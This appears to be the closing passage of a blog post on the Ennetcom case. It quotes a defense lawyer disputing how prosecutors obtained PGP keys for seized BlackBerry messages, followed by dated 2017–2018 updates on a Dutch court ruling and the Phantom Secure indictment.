Calculating the number of messages to the number of users, 90 messages per user would have been made accessible. Given the fact that the data on the servers was erased after 48 hours by default, in other words; the messages were destroyed, it would indeed mean for those 40,000 users with 3.6 million messages that only the last 48 hours were made accessible.

The public prosecution speaks in the press release remarkably about “encryption keys which were obtained by the public prosecutor and police during the investigation.” Client’s organization however did not obtain these keys. These keys are in possession of the company responsible for making PGP, namely Symantec. There are many other companies that sell their PGP products in the same way as the client’s company did. The “falling of this communication into the hands of” seems therefore involve a very shadowy area of irregularities and possibly the result of present-day wild hacking.

The public prosecutor assumes to get started on this “loot”, but the Canadian court had, and in my opinion deceived by the public prosecution service, based on the given suspicion, only authorized the use of the confiscated data for 4 defined and appointed investigations. And then there is always the question what messages can be linked to which cases and subsequently be linked to which physical entities.

That still seems a hack too much for me.

UPDATES (from new to old)

UPDATE 2018-04-19: judge in Dutch criminal court case rules (in Dutch) evidence collected in the Ennetcom case, as processed (in Dutch)  by the Netherlands Forensics Institute’s big data collection & search engine “Hansken”, lawful. The plaintiff is convicted to 18 years imprisonment for money laundering and attempted murder.

UPDATE 2018-03-14: yet another case involving PGP-enabled BlackBerry, this time about a Canadian-owned company named Phantom Security Communications aka Phantom Secure: Canadian Company Custom-Made Encrypted Phones for Cartels: FBI. It may have been active “as early as 2008 and continuing up to and including February 28, 2018” in the U.S. According to the indictment (.pdf), their marketing materials stated that on reception of new BlackBerry phones their technical team “removed the hardware and software responsible for all external architecture, including voice communication, microphone, GPS navigation, camera, Internet and Messenger service”. Customers paid $2000-3500 per six-month subscription.

UPDATE 2017-08-31: a blogpost by Bits of Freedom states that according to Inez Weski, defense lawyer in case spawn from the Ennetcom investigation, ‘the PGP [private] keys’ were located ‘at a different organization’ than the organization where the Canadian RCMP seized the (or an?) Ennetcom server.

EOF